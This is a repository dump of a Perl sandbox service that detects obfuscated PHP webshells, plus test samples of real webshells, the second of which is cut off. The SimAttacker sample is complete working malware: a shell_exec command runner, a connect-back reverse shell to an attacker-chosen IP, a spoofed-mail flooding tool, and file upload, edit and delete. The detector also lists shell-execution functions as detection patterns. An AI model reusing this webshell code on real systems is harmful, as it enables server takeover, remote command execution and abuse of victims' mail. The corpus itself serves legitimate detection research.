122 |    my @eval_func = qw(eval assert create_function);
123 | 
124 |    # コード復号化のための関数
125 |    my @deobfuscate_func = qw(base64_decode gzinflate str_rot13 
126 |                              gzuncompress strrev rawurldecode);
127 | 
128 |    map{ 
129 |       my $key = $_;
130 |       if(grep { $key eq $_ } @eval_func){
131 |          my $count = $info->{$key};
132 |          push(@msg, "$key($count)");
133 |          $eval_flag++;
134 |       }
135 |    } keys %$info;
136 | 
137 |    # コード再評価関数の使用に基づきスコアリング
138 |    map{ 
139 |       my $key = $_;
140 |       if(grep { $key eq $_ } @deobfuscate_func){
141 |          my $count = $info->{$key};
142 |          push(@msg, "$key($count)");
143 |          $deobfuscate_flag++;
144 |       }
145 |    } keys %$info;
146 | 
147 |    if($eval_flag && $deobfuscate_flag){
148 |       return (1, \@msg);
149 |    }else{
150 |       return (0, \@msg);
151 |    }
152 | }
153 | 
154 | sub detect_webshell($){
155 |    my $codes = shift;
156 |    my $flag=0;
157 |    my @msg;
158 | 
159 |    # 以下の関数がひとつでも使用されているならwebshellとみなす
160 |    # ここにはpreg_replaceを含めるべきではないか？
161 |    #my @webshell_codes = qw(
162 |    #   system exec passthru shell_exec popen proc_open 
163 |    #   pcntl_exec eval assert create_function
164 |    #);
165 | 
166 |    # 検知関数をこれだけにすると誤検知はほぼなくなる。
167 |    # しかしweebvelyなどの外からwebshell_codeが渡ってくるものは検知できなくなる
168 |    my @webshell_codes = qw(
169 |       system exec passthru shell_exec popen proc_open pcntl_exec    
170 |    );
171 | 
172 |    foreach my $code (@$codes){
173 |       next unless defined $code;
174 |       my $strip = strip_php_code($code);            
175 |       foreach my $webshell_code (@webshell_codes){
176 |          my $count = scalar( () = $strip =~ /[^\w]$webshell_code\(.+\)/g);
177 |          if($count){  
178 |             push(@msg, "$webshell_code($count)");
179 |             $flag++;
180 |          }
181 |       }      
182 |    }
183 | 
184 |    return ($flag,\@msg);
185 | }
186 | 
187 | #-------------#
188 | # MAIN ROUTIN #
189 | #-------------#
190 | sub main(){
191 |    my $app = sub {
192 |       # obscan.plからのパラメータ取得
193 |       my $req = Plack::Request->new(shift);
194 | 
195 |       my $uploads = $req->uploads;
196 |       my $file_name = $uploads->{data}->{filename};    # 対象ファイル名
197 |       my $tmp_path = $uploads->{data}->{tempname};    # 対象ファイルの一時保存先
198 |       my $client_md5 = $req->param('md5');        # 対象ファイルのCLIENT側で取得したmd5
199 |       my $mode = $req->param('mode');             # mode
200 | 
201 |       # mode値のチェック
202 |       my @allow_mode = qw(detect-obfuscate detect-webshell deobfuscate tracelog viewfunc);
203 |       unless(grep {$mode eq $_} @allow_mode){
204 |          return [ 500, [ 'Content-Type' => 'text/plain' ], [ "Unexcepted mode paramaeter" ], ];
205 |       }
206 | 
207 |       #--------------#
208 |       # 解析準備処理 #
209 |       #--------------#
210 | 
211 |       # plackによりアップロードされたファイルはテンポラリファイルとして所定の位置に配置される。
212 |       # これを解析場所に配置する。
213 |       unless(-f $tmp_path){
214 |          # もしテンポラリファイルが存在しないならエラーを返す
215 |          return [ 500, [ 'Content-Type' => 'text/plain' ], [ "Not found temporary file" ], ];
216 |       }
217 |       
218 |       # クライアントから渡されたファイル名を元に解析場所に配置した完全なファイルパスを取得する       
219 |       my $ana_path = $YAML->{WEBROOT_DIR} . $file_name;
220 | 
221 |       # テンポラリファイルを解析場所に配置する
222 |       unless(move $tmp_path, $ana_path){
223 |          # テンポラリファイルを解析場所に配置できないなら、
224 |          # テンポラリファイルを削除してエラーを返す。
225 |          cleanup($tmp_path);
226 |          return [ 500, [ 'Content-Type' => 'text/plain' ], [ "Failed move $tmp_path to $ana_path : $!" ], ];
227 |       }
228 | 
229 |       # 解析場所に配置したファイルを実行可能な権限に変更する
230 |       unless(chmod 0666, $ana_path){
231 |          # 権限変更ができないなら解析場所に配置したファイルを削除して、エラーを返す
232 |          cleanup($ana_path);
233 |          return [ 500, [ 'Content-Type' => 'text/plain' ], [ "Failed chmod $ana_path : $!" ], ];
234 |       }
235 | 
236 |       # クライアントから渡されたmd5値とサーバ上で取得したmd5値が一致するのかを確認する。      
237 |       unless($client_md5 eq get_md5($ana_path)){
238 |          # md5が一致しないならファイルのアップロード時に壊れているのでファイルを削除してエラーを返す
239 |          cleanup($ana_path);
240 |          return [ 500, [ 'Content-Type' => 'text/plain' ], [ "upload file is corrupted." ], ];
241 |       }      
242 | 
243 |       #------------------#
244 |       # TRACELOG取得処理 # 
245 |       #------------------#
246 | 
247 |       my $tracelog_file;
248 | 
249 |       # tracelog取得処理は未知数のエラーが発生する可能性が高いのでトラップする
250 |       eval{
251 |          # ブラウザの作成
252 |          my $ua = LWP::UserAgent->new;
253 |          $ua->agent("OPWD CLIENT ;-)");
254 |          $ua->timeout($YAML->{SANDBOX_UA_TIMEOUT});
255 |    
256 |          # 解析対象ファイルを実行できるURIを構築する
257 |          my $ana_uri;
258 |          if($YAML->{SANDBOX_HTTPD_ENGINE} eq 'APACHE'){
259 |             $ana_uri = "http://127.0.0.1:".$YAML->{SANDBOX_HTTPD_PORT}."/".$file_name;
260 |          }else{
261 |             $ana_uri = "http://".$YAML->{PHP_BUILTIN_SERVER_HOST}.":".$YAML->{PHP_BUILTIN_SERVER_PORT}."/".$file_name;
262 |          } 
263 |    
264 |          # tracelogファイルパスを取得する
265 |          $tracelog_file = "$YAML->{TRACELOG_DIR}".$file_name.".xt";
266 |    
267 |          # 解析PHPをApache経由で実行し、Xdebugにtracelogを吐かせる
268 |          my $response = $ua->get("$ana_uri");
269 |       };
270 | 
271 |       if($@){
272 |          cleanup($ana_path);
273 |          cleanup($tracelog_file);
274 |          return [ 500, [ 'Content-Type' => 'text/plain' ], [ "SANDBOX browser eval trap : $@" ], ];
275 |       }
276 | 
277 |       #------------------#
278 |       # TRACELOG解析処理 #
279 |       #------------------#
280 | 
281 |       # $func_infoは関数名と出現回数を記録したハッシュリファレンス
282 |       # $stack_traceは関数呼び出しと引数を順序を考慮し格納したリストリファレンス
283 |       my ($func_info,$stack_trace) = parse_tracelog($tracelog_file);
284 |       # tracelogの生テキスト
285 |       my $trace_text = read_file($tracelog_file);
286 | 
287 |       # TRACELOGを取得したら解析対象ファイルやTRACELOGファイルは必要ないので削除する
288 |       cleanup($ana_path);
289 |       cleanup($tracelog_file);
290 | 
291 |       #--------------------------#
292 |       # モードにより返り値を分岐 #
293 |       #--------------------------#
294 | 
295 |       my %ret;
296 | 
297 |       # [viewfunc]は呼ばれた関数の一覧とその回数を出力する
298 |       if($mode eq 'viewfunc'){
299 |          %ret = ( 'mode' => 'viewfunc', 'body' => $func_info,); 
300 |          return [ 200, [ 'Content-Type' => 'text/plain' ], [ encode_json( \%ret ) ], ];
301 |       }
302 | 
303 |       # [tracelog]はxdebugにより取得されたtracelogをそのまま返す 
304 |       if($mode eq 'tracelog'){
305 |          %ret = ( 'mode' => 'tracelog', 'body' => $trace_text,);
306 |          return [ 200, [ 'Content-Type' => 'text/plain' ], [ encode_json( \%ret ) ], ];
307 |       }     
308 | 
309 |       # [detect-obfuscate]は難読化されたファイルか否かを判定し、結果を返す
310 |       if($mode eq 'detect-obfuscate'){
311 |          my ($flag, $msg) =  detect_obfuscate($func_info); 
312 |          if($flag){
313 |             # 難読化判定
314 |             %ret = ( 'mode' => 'detect-obfuscate', 'body' => "OBFUSCATE[o] INFO[" . join(", ", @$msg) ."]");
315 |          }else{
316 |             # 難読化されていない
317 |             %ret = ( 'mode' => 'detect-obfuscate', 'body' => "OBFUSCATE[x] INFO[" . join(", ", @$msg) ."]");
318 |          }
319 |          return [ 200, [ 'Content-Type' => 'text/plain' ], [ encode_json( \%ret ) ], ];
320 |       }
321 | 
322 |       # [deobfuscate]は再評価処理に渡された引数を全て返す
323 |       if($mode eq 'deobfuscate'){
324 |          %ret = ( 'mode' => 'deobfuscate', 'body' => deobfusucate($stack_trace),);
325 |          return [ 200, [ 'Content-Type' => 'text/plain' ], [ encode_json( \%ret ) ], ];
326 |       }
327 | 
328 |       # [detect-webshell]は難読化されたwebshellか否かを判定し、結果を返す。
329 |       if($mode eq 'detect-webshell'){
330 |          my ($obfuscate_flag, $obfuscate_msg) =  detect_obfuscate($func_info); 
331 |          unless($obfuscate_flag){
332 |             # 難読化されていないファイル
333 |             %ret = ( 'mode' => 'detect-obfuscate', 'body' => "OBFUSCATE[x] INFO[" . join(", ", @$obfuscate_msg) ."]");
334 |             return [ 200, [ 'Content-Type' => 'text/plain' ], [ encode_json( \%ret ) ], ];
335 |          }
336 | 
337 |          # 以降難読化されているファイルであるためwebshellか否かの判定を行う
338 |          my ($webshell_flag, $webshell_msg) = detect_webshell(deobfusucate($stack_trace));
339 |          unless($webshell_flag){
340 |             # 難読化されているがwebshellではない
341 |             %ret = ( 'mode' => 'detect-obfuscate', 'body' => "OBFUSCATE[o] WEBSHELL[x] INFO[" . join(", ", @$obfuscate_msg, @$webshell_msg) ."]");
342 |          }else{
343 |             # 難読化されているWebShellである
344 |             %ret = ( 'mode' => 'detect-obfuscate', 'body' => "OBFUSCATE[o] WEBSHELL[o] INFO[" . join(", ", @$obfuscate_msg, @$webshell_msg) ."]");
345 |          }
346 | 
347 |          return [ 200, [ 'Content-Type' => 'text/plain' ], [ encode_json( \%ret ) ], ];
348 |       }
349 |    };
350 | 
351 |    return $app;
352 | }
353 | 
354 | main();
355 | 
356 | 


--------------------------------------------------------------------------------
/t/malware/98.php:
--------------------------------------------------------------------------------
  1 | <?
  2 | //download Files  Code
  3 | $fdownload=$_GET['fdownload'];
  4 | if ($fdownload <> "" ){
  5 | // path & file name
  6 | $path_parts = pathinfo("$fdownload");
  7 | $entrypath=$path_parts["basename"];
  8 | $name = "$fdownload";
  9 | $fp = fopen($name, 'rb');
 10 | header("Content-Disposition: attachment; filename=$entrypath");
 11 | header("Content-Length: " . filesize($name));
 12 | fpassthru($fp);
 13 | exit;
 14 | }
 15 | ?>
 16 | 	
 17 | <html>
 18 | 
 19 | <head>
 20 | <meta http-equiv="Content-Language" content="en-us">
 21 | <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
 22 | <title>SimAttacker - Vrsion : 1.0.0 - priv8 4 My friend </title>
 23 | <style>
 24 | <!--
 25 | body         { font-family: Tahoma; font-size: 8pt }
 26 | -->
 27 | </style>
 28 | </head>
 29 | <body>
 30 | <?
 31 | error_reporting(E_ERROR | E_WARNING | E_PARSE);
 32 | 
 33 |  //File Edit
 34 |  $fedit=$_GET['fedit'];
 35 |  if ($fedit <> "" ){
 36 |  $fedit=realpath($fedit);
 37 |  $lines = file($fedit);
 38 |  echo "<form action='' method='POST'>";
 39 | echo "<textarea name='savefile' rows=30 cols=80>" ;
 40 | foreach ($lines as $line_num => $line) {
 41 |  echo htmlspecialchars($line);
 42 | }
 43 | echo "</textarea>
 44 | 	<input type='text' name='filepath'  size='60' value='$fedit'>
 45 | 	<input type='submit' value='save'></form>";
 46 | 	$savefile=$_POST['savefile'];
 47 | 	$filepath=realpath($_POST['filepath']);
 48 | 	if ($savefile <> "") 
 49 | 	{
 50 | 	$fp=fopen("$filepath","w+");
 51 | 	fwrite ($fp,"") ;
 52 | 	fwrite ($fp,$savefile) ;
 53 | 	fclose($fp);
 54 | 	echo "<script language='javascript'> close()</script>";
 55 | 	}
 56 | exit();
 57 |  }
 58 | ?>
 59 | <?
 60 | // CHmod - PRimission
 61 | $fchmod=$_GET['fchmod'];
 62 | if ($fchmod <> "" ){
 63 | $fchmod=realpath($fchmod);
 64 | echo "<center><br>
 65 | chmod for :$fchmod<br>
 66 | <form method='POST' action=''><br>
 67 | Chmod :<br>
 68 | <input type='text' name='chmod0' ><br>
 69 | <input type='submit' value='change chmod'>
 70 | </form>";
 71 | $chmod0=$_POST['chmod0'];
 72 | if ($chmod0 <> ""){
 73 | chmod ($fchmod , $chmod0);
 74 | }else {
 75 | echo "primission Not Allow change Chmod";
 76 | }
 77 | exit();
 78 | }
 79 | ?>
 80 | 	
 81 | <div align="center">
 82 | 	<table border="1" width="100%" id="table1" style="border: 1px dotted #FFCC99" cellspacing="0" cellpadding="0" height="502">
 83 | 		<tr>
 84 | 			<td style="border: 1px dotted #FFCC66" valign="top" rowspan="2">
 85 | 				<p align="center"><b>
 86 | 				<font face="Tahoma" size="2"><br>
 87 | 				</font>
 88 | 				<font color="#D2D200" face="Tahoma" size="2">
 89 | 				<span style="text-decoration: none">
 90 | 				<font color="#000000">
 91 | 				<a href="?id=fm&dir=<?
 92 | 	echo getcwd();
 93 | 	?>
 94 | 	">
 95 | 				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
 96 | 				<p align="center"><b><a href="?id=cmd">
 97 | 				<span style="text-decoration: none">
 98 | 				<font face="Tahoma" size="2" color="#000000">
 99 | 				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
100 | 				<p align="center"><b><a href="?id=fake-mail">
101 | 				<font face="Tahoma" size="2" color="#000000">
102 | 				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
103 | 				<p align="center"><b>
104 | 				<font face="Tahoma" size="2" color="#000000">
105 | 				<a href="?id=cshell">
106 | 				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
107 | 				<p align="center"><b>
108 | 				<font color="#000000" face="Tahoma" size="2">
109 | 				<a href="?id=">
110 | 				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
111 | 				<p>&nbsp;<p align="center">&nbsp;</td>
112 | 			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
113 | 			<?
114 | 			//*******************************************************
115 | 			//Start Programs About US
116 | 			$id=$_GET['id'];
117 | 
118 | 			if ($id=="") {
119 | 			echo "
120 | 			<font face='Arial Black' color='#808080' size='1'>
121 | ***************************************************************************<br>
122 | &nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
123 | &nbsp;Programer : Hossein Asgary <br>
124 | &nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
125 | &nbsp;please : If you find bug or problems in program , tell me by : <br>
126 | &nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
127 | Enjoy :) [Only 4 Best Friends ] <br>
128 | ***************************************************************************</font></span></p>
129 | ";
130 | 
131 | echo "<font color='#333333' size='2'>OS :". php_uname();
132 | echo "<br>IP :". 
133 | ($_SERVER['REMOTE_ADDR']);
134 | echo "</font>";
135 | 
136 | 
137 | 			}
138 | 			//************************************************************
139 | 			//cmd-command line
140 | 			$cmd=$_POST['cmd'];
141 | 			if($id=="cmd"){
142 | 		$result=shell_exec("$cmd");
143 | 		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
144 | 		echo "<center>
145 | 		<textarea rows=20 cols=70 >$result</textarea><br>
146 | 		<form method='POST' action=''>
147 | 		<input type='hidden' name='id' value='cmd'>
148 | 		<input type='text' size='80' name='cmd' value='$cmd'>
149 | 		<input type='submit' value='cmd'><br>";
150 | 			
151 | 			
152 | 			
153 | 			}
154 | 			
155 | 		//********************************************************	
156 | 		
157 | 		//fake mail = Use victim server 4 DOS - fake mail 
158 | 		if ( $id=="fake-mail"){
159 | 		error_reporting(0);
160 | 		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
161 | 		echo "<center><form method='post' action=''>
162 | 		Victim Mail :<br><input type='text' name='to' ><br>
163 | 		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
164 | 		Comments:
165 | 		<br>
166 | 		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
167 | 		<input type='submit' value='Send Mail Strm ' >
168 | 		</form></center>";
169 | 		//send Storm Mail
170 | 		$to=$_POST['to'];
171 | 		$nom=$_POST['nom'];
172 | 		$Comments=$_POST['Comments'];
173 | 		if ($to <> "" ){
174 | 		for ($i = 0; $i < $nom ; $i++){
175 | 		$from = rand (71,1020000000)."@"."Attacker.com";
176 | 		$subject= md5("$from");
177 |         mail($to,$subject,$Comments,"From:$from");
178 |         echo "$i is ok";
179 |         }      
180 |         echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
181 |         }
182 | 		}
183 | 		//********************************************************
184 | 
185 | 			//Connect Back -Firewall Bypass
186 | 			if ($id=="cshell"){
187 | 			echo "<br>Connect back Shell , bypass Firewalls<br>
188 | 			For user :<br>
189 | 			nc -l -p 1019 <br>
190 | 			<hr>
191 | 			<form method='POST' action=''><br>
192 | 			Your IP & BindPort:<br>
193 | 			<input type='text' name='mip' >
194 | 			<input type='text' name='bport' size='5' value='1019'><br>
195 | 			<input type='submit' value='Connect Back'>
196 | 			</form>";
197 | 		 $mip=$_POST['mip'];
198 | 		 $bport=$_POST['bport'];
199 | 		 if ($mip <> "")
200 | 		 {
201 | 		 $fp=fsockopen($mip , $bport , $errno, $errstr);
202 | 		 if (!$fp){
203 | 		       $result = "Error: could not open socket connection";
204 | 		 }
205 | 		 else {
206 | 		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
207 | 	  while(!feof($fp)){ 
208 |        fputs ($fp," bash # ");
209 |        $result= fgets ($fp, 4096);
210 |       $message=`$result`;
211 |        fputs ($fp,"--> ".$message."\n");
212 |       }
213 |       fclose ($fp);
214 | 		 }
215 | 		 }
216 | 			}
217 | 			
218 | 		//********************************************************
219 | 			//Spy File Manager
220 | 			$homedir=getcwd();
221 | 			$dir=realpath($_GET['dir'])."/";
222 | 			if ($id=="fm"){
223 | 			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
224 |                   &nbsp;<b>
225 |                   <form action='' method='GET'>
226 |                   &nbsp;Path:</b>
227 |                   <input type='hidden' name='id' value='fm'>
228 |                   <input type='text' name='dir' size='80' value='$dir'>
229 |                   <input type='submit' value='dir'>
230 |                   </form>
231 |                  <br>";
232 | 
233 | 			echo "
234 | 
235 | <div align='center'>
236 | 
237 | <table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
238 | 	<tr>
239 | 		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
240 | 		<td height='28' width='82' align='center'>
241 | 		<font color='#000080' size='2'><b>Size KByte</b></font></td>
242 | 		<td height='28' width='83' align='center'>
243 | 		<font color='#008000' size='2'><b>Download</b></font></td>
244 | 		<td height='28' width='66' align='center'>
245 | 		<font color='#FF9933' size='2'><b>Edit</b></font></td>
246 | 		<td height='28' width='75' align='center'>
247 | 		<font color='#999999' size='2'><b>Chmod</b></font></td>
248 | 		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
249 | 	</tr>";
250 | 		    if (is_dir($dir)){
251 | 		    if ($dh=opendir($dir)){
252 | 		    while (($file = readdir($dh)) !== false) {
253 | 		    $fsize=round(filesize($dir . $file)/1024);
254 | 		
255 | 		    
256 | 	echo " 
257 | 	<tr>
258 | 		<th width='250' height='22' align='left' nowrap>";
259 | 		if (is_dir($dir.$file))
260 | 		{
261 | 		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
262 | 		}
263 | 		else {
264 | 		echo "<font size='2' color='#666666'>&nbsp;$file ";
265 | 		}
266 | 		echo "</a></font></th>
267 | 		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
268 | 		if (is_file($dir.$file))
269 | 		{
270 | 		echo "$fsize";
271 | 		}
272 | 		else {
273 | 		echo "&nbsp; ";
274 | 		}
275 | 		echo "
276 | 		</b></font></td>
277 | 		<td width='103' align='center' nowrap>";
278 | 		if (is_file($dir.$file)){
279 | 		if (is_readable($dir.$file)){
280 | 		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
281 | 		}else {
282 | 		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
283 | 		 }
284 | 		}else {
285 | 		echo "&nbsp;";
286 | 		 }
287 | 		echo "
288 | 		</a></font></td>
289 | 		<td width='77' align='center' nowrap>";
290 | 		if (is_file($dir.$file))
291 | 		{
292 | 		if (is_readable($dir.$file)){
293 | 		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
294 | 		}else {
295 | 		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
296 | 		 }
297 | 		}else {
298 | 		echo "&nbsp;";
299 | 		 }
300 | 		echo "
301 | 		</a></font></td>
302 | 		<td width='86' align='center' nowrap>";
303 | 		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
304 | 		echo "<font size='1' color='#999999'>Dont in windows";
305 | 		}
306 | 		else {
307 | 		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
308 | 		}
309 | 		echo "</a></font></td>
310 | 		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
311 | 	</tr>
312 | 	";
313 | 		      }
314 | 		      closedir($dh);
315 | 		    } 
316 | 		    }
317 | 		    echo "</table>
318 | <form enctype='multipart/form-data' action='' method='POST'>
319 |  <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
320 |  Send this file: <input name='userfile' type='file' />
321 |  <inpt type='hidden' name='Fupath'  value='$dir'>
322 |  <input type='submit' value='Send File' />
323 | </form> 
324 | 		    </div>";
325 | 			}
326 | //Upload Files 
327 | $rpath=$_GET['dir'];
328 | if ($rpath <> "") {
329 | $uploadfile = $rpath."/" . $_FILES['userfile']['name'];
330 | print "<pre>";
331 | if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
332 | echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
333 | echo "<script language='javascript'> history.back(2)</script>";
334 | }
335 |  }
336 |  //file deleted
337 | $frpath=$_GET['fdelete'];
338 | if ($frpath <> "") {
339 | if (is_dir($frpath)){
340 | $matches = glob($frpath . '/*.*');
341 | if ( is_array ( $matches ) ) {
342 |   foreach ( $matches as $filename) {
343 |   unlink ($filename);
344 |   rmdir("$frpath");
345 | echo "<script language='javascript'> alert('Success! Please refresh')</script>";
346 | echo "<script language='javascript'> history.back(1)</script>";
347 |   }
348 |   }
349 |   }
350 |   else{
351 | echo "<script language='javascript'> alert('Success! Please refresh')</script>";
352 | unlink ("$frpath");
353 | echo "<script language='javascript'> history.back(1)</script>";
354 | exit(0);
355 | 
356 |   }
357 |   
358 | 
359 | }
360 | 			?>
361 | 			
362 | 			</td>
363 | 		</tr>
364 | 		<tr>
365 | 			<td style="border: 1px dotted #FFCC66">
366 | 			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
367 | 			Copyright 2004-Simorgh Security<br>
368 | 			Hossein-Asgari<br>
369 | 			</font><font color="#c0c0c0" size="1" face="Tahoma">
370 | 		<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
371 | 		<font color="#666666">www.simorgh-ev.com</font></a></font></td>
372 | 		</tr>
373 | 	</table>
374 | </div>
375 | 
376 | </body>
377 | 
378 | </html>


--------------------------------------------------------------------------------
/t/malware/15.php:
--------------------------------------------------------------------------------
  1 | <?php
  2 | /****************************************************************
  3 | *
  4 | *	.::[csh]::. //(.::[c0derz]::. web-shell) v. 0.1.1 release
  5 | *			 ----------------------------
  6 | *       c0ded by: [vINT 21h]
  7 | *       URL: http://c0derz.org.ua
  8 | *       e-mail: vint21h@c0derz.org.ua
  9 | *       ICQ: 255577736
 10 | *
 11 | ****************************************************************/
 12 | 
 13 | /***************************************************************
 14 |  *
 15 |  *   This program is free software; you can redistribute it and/or modify
 16 |  *   it under the terms of the GNU General Public License as published by
 17 |  *   the Free Software Foundation; either version 2 of the License', or
 18 |  *   ('at your option) any later version.
 19 |  *
 20 |  ****************************************************************/
 21 | 
 22 | 
 23 | $self = $_SERVER['PHP_SELF'];
 24 | $docr = $_SERVER['DOCUMENT_ROOT'];
 25 | $achtung=1;
 26 | //authentification
 27 | $authentification = 1;
 28 | $name='63a9f0ea7bb98050796b649e85481845';//root
 29 | $pass='5cdbe638246729485a5eab6b93f170e2';//c0derz
 30 | $caption="Enter your login and password";
 31 | if ($authentification &&  (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || md5($HTTP_SERVER_VARS['PHP_AUTH_USER'])!=$name || md5($HTTP_SERVER_VARS['PHP_AUTH_PW'])!=$pass))
 32 | {
 33 |     header("WWW-Authenticate: Basic realm=\"$caption\"");
 34 |     header("HTTP/1.0 401 Unauthorized");
 35 |     exit("<BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888><h1>Error 401</h1><h2>Unauthorized access!</h2>");
 36 | }
 37 | if($achtung)
 38 |   error_reporting(E_ALL&~E_NOTICE);
 39 | else
 40 |   error_reporting(0);
 41 |   //---------------------
 42 | 
 43 | //get page generating time
 44 | if (!function_exists("get_micro_time")) {
 45 |  function get_micro_time() {
 46 |   list($usec, $sec) = explode(" ", microtime());
 47 |   return ((float)$usec + (float)$sec);
 48 |  }
 49 | }
 50 | define("start_time",get_micro_time());
 51 | $cshver="<a href=http://c0derz.org.ua target='_BLANK' title='.::[c0derz shell]::.'><b>.::[csh]::.</b></a> v. 0.1.1 release";
 52 |  //-------------------------------
 53 | 
 54 |  //normalize text encoding
 55 |  function decode($buffer){
 56 | return  convert_cyr_string ($buffer, 'd', 'w');
 57 | }
 58 | //---------------------------------
 59 | 
 60 | ?>
 61 | 
 62 | <HTML>
 63 | <HEAD>
 64 | <meta http-equiv='pragma' content='no-cache'>
 65 | 
 66 | <?php
 67 | echo "<TITLE>.:[csh]:.| [".get_current_user()."@".$SERVER_NAME."]</TITLE>";
 68 | ?>
 69 | 
 70 | <STYLE>
 71 | BODY{scrollbar-base-color: 000000;
 72 |           scrollbar-face-color: #aaaaaa;
 73 |           scrollbar-highlight-color: #dddddd;
 74 |           scrollbar-shadow-color: #544554;
 75 |           scrollbar-dark-shadow-color: #111111;
 76 |           scrollbar-track-color: #222222;
 77 |           scrollbar-arrow-color: #dcdddc}
 78 | 
 79 | a:visited { color: #dcdcdc; text-decoration: none}
 80 | A:active { color: #dcdcdc; text-decoration: none; }
 81 | a:link {  color: #dcdcdc; text-decoration: none}
 82 | a:hover {  color: #ff3333; text-decoration: none}
 83 | 
 84 | BODY {
 85 | scrollbar-face-color: transparent;
 86 | scrollbar-shadow-color: transparent;
 87 | scrollbar-highlight-color: transparent;
 88 | scrollbar-3dlight-color: transparent;
 89 | scrollbar-darkshadow-color: transparent;
 90 | scrollbar-track-color: #777777;
 91 | scrollbar-arrow-color: #777777;
 92 | }
 93 | </STYLE>
 94 | </HEAD>
 95 | <BODY text=#000000 vLink=#000000 aLink=#000000 link=#000000 bgcolor=#888888>
 96 | <DIV align=center>
 97 | <TABLE bordercolor=#000000 cellSpacing=1 width=950 bgColor=#000000 border=0 height=600>
 98 | <hr>
 99 | <table width=950>
100 | <tr>
101 |   <td style="border: 1 solid #000000" bgcolor="677667">
102 | <font size="1" face="verdana" color="#000000">
103 | <left>
104 |  <table width=100%>
105 | <tr>
106 |   <td style="border: 1 solid #000000" bgcolor="555555" >
107 |   <font size="1" face="verdana" color="#000000">
108 | 
109 | <?php
110 | echo "<font size=1 face=verdana color=fcfcfc><b>Server info:</b></font><br>";
111 | ?>
112 | 
113 |  </td>
114 |  </tr>
115 |  </table>
116 | 
117 | <?php
118 | //server info
119 | echo "Server name: <b><font color=#dcdcdc>".$SERVER_NAME."</b></font><br>";
120 | echo "Server IP adress:<b><font color=#dcdcdc>".$server_ip=gethostbyname($SERVER_NAME)."</b></font> <br>";
121 | echo (($safe_mode)?("Safe Mode: <font color=#ffffff><b>ON</b></font><br> "):
122 |          ("Safe Mode: <font color=#555555><b>OFF</b></font><br> "));
123 | echo "OS: <font color=#dcdcdc>";
124 |  if (empty($uname)){
125 |   echo (php_uname()."</font><br>");
126 |  }else
127 |   echo $uname."</font><br>";
128 |   echo 'User: <font color=#dcdcdc>' .get_current_user() . '</font><br>';
129 |    echo "HTTP Server: <font color=#dcdcdc>".$server=$HTTP_SERVER_VARS['SERVER_SOFTWARE']."</font><br>";
130 |  echo ("PHP: <font color=#dcdcdc>".phpversion()."</font><br> ");
131 |   echo ("MySQL: ");
132 |  if($mysql_stat=function_exists('mysql_connect')){
133 |   echo "<font color=#ffffff><b>ON</b> </font><b>";
134 |  }
135 |  else {
136 |   echo "<font color=#555555><b>OFF</b> </font><br>";
137 |  }
138 |  //---------------------------
139 |  ?>
140 | 
141 |  </td>
142 |  </tr>
143 |  </table>
144 | <tr>
145 | <td width="100" bgcolor="555555" valign="top">
146 | <center>
147 | <font face="tahoma" size="1" color="#000000"><div align="center"><b>.::[Shell functions]::.</b></div></font>
148 | <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
149 | <table width=100%>
150 | <tr>
151 |   <td style="border: 1 solid #000000" bgcolor="888888" onmouseover="this.style.backgroundColor='#677667';" onmouseout="this.style.backgroundColor='#888888';">
152 |  <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
153 | <a href="<?php echo $PHP_SELF."?mode=shell"?>" title="./$shell"><b>./ $shell</b></a><br>
154 | </td>
155 |  </tr>
156 |  </table>
157 | <table width=100%>
158 | <tr>
159 |   <td style="border: 1 solid #000000" bgcolor="677667" onmouseover="this.style.backgroundColor='#888888';" onmouseout="this.style.backgroundColor='#677667';">
160 |  <font style="font: 11px/14px verdana, arial, sans-serif; color: #554455;">
161 | <a href="<?php echo $PHP_SELF."?mode=phpcode"?>" title="PHP code execution">./php execution</a><br>
162 | </td>
163 |  </tr>
164 |  </table>
165 |  <table width=100%>
166 | <tr>
